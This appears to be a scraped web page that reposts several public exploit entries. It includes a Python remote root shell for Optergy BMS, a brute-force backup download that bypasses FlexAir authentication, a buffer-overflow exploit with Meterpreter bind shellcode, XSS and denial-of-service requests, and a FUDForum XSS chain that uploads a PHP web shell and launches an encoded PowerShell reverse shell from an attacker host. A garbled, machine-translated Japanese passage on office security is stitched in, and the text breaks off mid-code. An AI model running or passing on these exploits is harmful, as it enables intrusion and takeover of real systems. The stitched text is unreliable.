HireHackking

# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage:https://www.realtek.com/en/ # Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA # Version: 6.4.10041.133 # Tested on: Windows 10 Home Single Language # CVE : N/A # Explot-Realtek.txt #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto C:\Users\user>sc query RtkI2SCodec NOMBRE_SERVICIO: RtkI2SCodec TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0

# Title: Optergy 2.3.0a - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7276 # PoC: #!/usr/bin/env python # # Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor) # # Affected version <=2.0.3a (Proton and Enterprise) # ############################################################################## # # lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19 # Challenge received: 1547540929287 # SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93 # MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31 # Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31 # # id # uid=0(root) gid=0(root) groups=0(root) # ############################################################################## # # import os####### import sys###### import json##### import hashlib## import requests# piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n' sys.exit() while True: challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get' try: req1 = requests.get(challenge_url) get_challenge = json.loads(req1.text) challenge = get_challenge['response']['message'] print 'Challenge received: ' + challenge hash_object = hashlib.sha1(challenge.encode()) print 'SHA1: '+(hash_object.hexdigest()) h1 = (hash_object.hexdigest()) hash_object = hashlib.md5(h1.encode()) print 'MD5 from SHA1: '+(hash_object.hexdigest()) h2 = (hash_object.hexdigest()) print 'Answer: '+h1+h2 zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html' zeCommand = raw_input('# ') if zeCommand.strip() == 'exit': sys.exit() zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h', 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'keep-alive', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'command' : 'sudo '+zeCommand, 'challenge' : challenge, 'answer' : h1+h2} zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) get_resp = json.loads(zeRequest.text) get_answ = get_resp['response']['message'] print get_answ except Exception: print '[*] Error!' break

# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-7666, CVE-2019-7667 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system #!/usr/bin/env python # -*- coding: utf8 -*- # # Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit # Authentication Bypass (Login with MD5 hash) # # Older versions: /links/Nova_Config_2019-01-03.bck # Older versions: /Nova/assets/Nova_Config_2019-01-03.bck # Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3 # Fixed versions: 2.4 # ################################################################################### # # lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080 # [+] Please wait while fetchin the backup config file... # [+] Found some juice! # [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck # [+] Saved as: Nova_Config_2019-01-07.bck-105625.db # lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db # SQLite version 3.22.0 2018-01-22 18:45:57 # Enter ".help" for usage hints. # sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2); # superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065 # sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe # sqlite> .q # lqwrm@metalgear:~/stuff/prima$ # ################################################################################### # # 11.01.2019 # import os####### import sys###### import time##### import requests# from datetime import timedelta, date from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '[+] Usage: '+piton+' [target]' print '[+] Target example 1: http://10.0.0.17:8080' print '[+] Target example 2: https://primanova.tld\n' sys.exit() host = sys.argv[1] def datum(start_date, end_date): for n in range(int ((end_date - start_date).days)): yield start_date + timedelta(n) start_date = date(2017, 1, 1) end_date = date(2019, 12, 30) print '[+] Please wait while fetchin the backup config file...' def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for mooshoo in datum(start_date, end_date): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b') h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False) if (h.status_code) == 200: print '[+] Found some juice!' print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck' timestr = time.strftime('%H%M%S') time.sleep(1) open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content) print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db' sys.exit() print '[-] No backup for you today. :('

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12653 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in # Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing # malicious JavaScript is echoed back as it is in JavaScript code in an HTML # response. URL ==================== https:// <HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0 Parameter ==================== ReportId Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12653 https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html Discoverer ==================== Rishu Ranjan

# Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 2.4.3.231 # Tested on: Windows 10 Home Single Language # CVE : N/A #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto C:\Users\user>sc query WsAppService NOMBRE_SERVICIO: WsAppService TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0

# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH) # Date: 2019-11-09 # Exploit Author: Samir sanchez garnica @sasaga92 # Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610 # Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown # Version: 6.2.9 # Tested: Windows 10 pro N and Windows XP SP3 # CVE : N/A #!/usr/bin/python ''' Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH) ''' import sys import random import string import struct import argparse def pattern_create(_type,_length): _type = _type.split(" ") if _type[0] == "trash": return _type[1] * _length elif _type[0] == "random": return ''.join(random.choice(string.lowercase) for i in range(_length)) elif _type[0] == "pattern": _pattern = '' _parts = ['A', 'a', '0'] while len(_pattern) != _length: _pattern += _parts[len(_pattern) % 3] if len(_pattern) % 3 == 0: _parts[2] = chr(ord(_parts[2]) + 1) if _parts[2] > '9': _parts[2] = '0' _parts[1] = chr(ord(_parts[1]) + 1) if _parts[1] > 'z': _parts[1] = 'a' _parts[0] = chr(ord(_parts[0]) + 1) if _parts[0] > 'Z': _parts[0] = 'A' return _pattern else: return "Not Found" def generate_file(_name_file, _payload): print _payload print "[+] Creando Archivo malicioso" _name_file = open(_name_file,"w+") _name_file.write(_payload) _name_file.close() print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload)) def main(): _parser = argparse.ArgumentParser() _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True) _args = _parser.parse_args() #badchars 0x0a, 0x0d, >= 0x80 _name_exploit = "ControlCenterPRO_v6_2_9.txt" #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70" "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50" "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b" "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30" "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c" "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b" "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70" "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a" "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70" "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32" "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f" "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79" "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d" "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37" "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58" "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a" "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71" "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73" "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63" "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63" "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f" "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58" "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70" "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39" "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f" "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63" "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46" "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69" "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37" "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71" "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77" "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31" "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72" "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63" "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38" "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51" "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73" "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35" "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48" "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44" "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a" "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79" "\x53\x41\x41") _offset = 664 _padding = 40000 _nseh = "\x42\x42\x77\x08" _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii if _args.os.lower() == "win10": _esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject)) elif _args.os.lower() == "winxp": _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend _inject += "A" * 16 _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject)) else: print("[-] os select is not support, select win10 or winxp") generate_file(_name_exploit, _inject) if __name__ == "__main__": main()

イントラネット端子のセキュリティ作業について考えてください イントラネットオフィスホスト オフィスホストコンピューターのセキュリティ要件 一般的なオフィスの要件は次のとおりです。 侵入検出と防御（鈍くするために、それは隠れまたは腰の製品であり、一般的に中国のウイルス対策ソフトウェアと統合されています）。 脆弱性保護（パッチング、一般的に中国のソフトウェアキル入力システムに統合されています）; ソフトウェア制御（ソフトウェアセンター機能、一般的にプラットフォームを獲得するのが一般的です）; ロギング; 制御シナリオ（SSIDなど、データリーク防止DLPが禁止されています） ここでは、ログの要件について説明します。ロギングは、通常、応答を攻撃したときに2つのことを行うことができ、アクティブな攻撃の原因を追跡できます。 ログは、電子メール、プロセス、サービス、コマンドなどを録画できます。 オフィスホストのインストールとオンラインレート改善計画 すべてのスタッフ検査 イントラネットアクセス 仮想デスクトップの背景の強制インストール 仕事の三部作 すべての従業員のインストールを促進します すべての従業員が再び現れます 脆弱性パッチをプッシュして、リアルタイムログを自動的にインストールして受け入れる キーコントロールオブジェクト 人事部 法律および財務部門 シニアエグゼクティブジョブグループ 秘書グループアシスタントグループ 投資および資金調達部門 他の主要人員 重要な結果の期待 独立防衛能力が向上しました 脆弱性パッチ修理自動化 安全な機密データストレージ 予測されたウイルスの発生シナリオ 簡素化された攻撃損失の発見 内部および外部サーバー サーバーのセキュリティ要件 一般的なサーバーの要件は次のとおりです。 Windows Server パッチのインストールと脆弱性コンポーネントの監視とアップグレード（サーバーは、再起動する必要があり、パッチングの状況が制御不可能であるため、自動アップグレードまたはパッチングを推奨しません） 自律防御機能（ヒップまたはHIDS機能、NIPはネットワークレイヤーでも使用できます） 信頼できるソフトウェアセンター（ソフトウェアコントロール） ログ監視 unixlike server 脆弱性監視と修理（監視下での手動アップグレード、POCと組み合わせた欠落スキャンエンジンを使用することをお勧めします） 自律防御モジュール（hipsまたはhids機能、NIPはネットワークレイヤーでも使用できます） 信頼できるソフトウェア監視（公式のアプリストアまたは公式ソースを使用） ログ監視 解決策 優れたインストールテンプレートを開発します（パッチウェル、必要なプログラムソフトウェアをインストールし、ログをコレクションプラットフォームに合わせます） オンラインインストールの要件は、インストールテンプレートに基づいている必要があります Unixlike System Serversが脆弱性修復のクローズドループを形成するための効果的なミスカニングメカニズムを確立し、Windowsシステムにも効果的です。また、自己開発のサーバーガードプログラムと統一された制御プラットフォーム管理（統一された脆弱性修復）をインストールまたは開発することもお勧めします。 すべてのログは、統一されたログ管理とアラームの自動分析に構成されています。 キー保証オブジェクト ドメインコントロール、RADIUSサーバー、SSOシングルサインオンサーバーなどの認証サーバー。 ルーター、スイッチ、ファイアウォール、DHCPサーバー、DNSサーバーなどの主要なネットワーク機器。 金融システム、人事システム、給与システム、採用システム、法制度、特許システム、ドキュメントシステム（契約、契約、入札書類）などの主要なシステム。 ソースコードバージョンコントローラー、重要な産業制御生産機器およびその他の生産要因。

# Exploit Title: Bematech Printer MP-4200 - Denial of Service # Date: 2019-11-11 # Exploit Author: Jonatas Fil # Vendor Homepage: https://www.bematech.com.br/ # Software Link: https://www.bematech.com.br/produto/mp-4200-th/ # Version: MP-4200 TH # Tested on: Windows and Linux # CVE : N/A DoS Poc: -------------------------------------------------------------------------------------------------------- POST /en/conf_admin.html HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,pt;q=0.8 Cache-Control: max-age=0 Referer: http://TARGET/en/conf_admin.html Content-Length: 40 Content-Type: application/x-www-form-urlencoded admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit -------------------------------------------------------------------------------------------------------- XSS Poc: -------------------------------------------------------------------------------------------------------- POST /en/conf_admin.html HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,pt;q=0.8 Cache-Control: max-age=0 Referer: http://printer.com/en/conf_admin.html Content-Length: 40 Content-Type: application/x-www-form-urlencoded admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit

# Exploit Title : FUDForum 3.0.9 - Remote Code Execution # Date: 2019-10-26 # Exploit Author: liquidsky (JMcPeters) # Vulnerable Software: FUDForum 3.0.9 # Vendor Homepage: https://sourceforge.net/projects/fudforum/ # Version: 3.0.9 # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download # Tested On: Windows / mysql / apache # Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE # Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks # CVE: CVE-2019-18873 // Greetz : wetw0rk, Fr13ndz, offsec =) // // Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution. // The areas impacted are the admin panel and the forum. // // XSS via username in Forum: // 1. Register an account and log in to the forum. // 2. Go to the user control panel. -> Account Settings -> change login // 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script> // 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system. // // XSS via user-agent in Admin Panel: // 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity. // 2. Send the XSS payload below (from an IP associated with an account) / host the script: // 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php // 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system. // function patience() { var u=setTimeout("grabShell()",5000); } // This function is to call the reverse shell php script (liquidsky.php). // currently using a powershell payload that will need to be modified. function grabShell() { var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41"; xhr = new XMLHttpRequest(); xhr.open("GET", url, true); xhr.send(null); } function submitFormWithTokenJS(token) { var xhr = new XMLHttpRequest(); xhr.open("POST", '/fudforum/adm/admbrowse.php', true); // Send the proper header information along with the request xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853"); var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory var fileName = "liquidsky.php"; var url = "/fudforum/adm/admbrowse.php"; var ctype = "application/x-php"; var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>"; var boundary = "-----------------------------9703186584101745941654835853"; var fileSize = fileData.length; var body = "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="cur"\r\n\r\n'; body += currentdir + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n'; body += token + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n'; body += "Content-Type: " + ctype + "\r\n\r\n"; body += fileData + "\r\n\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n'; body += "1" + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n'; body += fileName + "\r\n"; body += "--" + boundary + "\r\n"; body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n'; body += "Upload File" + '\r\n'; body += "--" + boundary + "--"; xhr.send(body); } //Grab SQ token var req = new XMLHttpRequest(); req.onreadystatechange=function() { if (req.readyState == 4 && req.status == 200) { var htmlPage = req.responseXML; /* fetch html */ var SQ = htmlPage.getElementsByTagName("input")[0] submitFormWithTokenJS(SQ.value); } } req.open("GET", 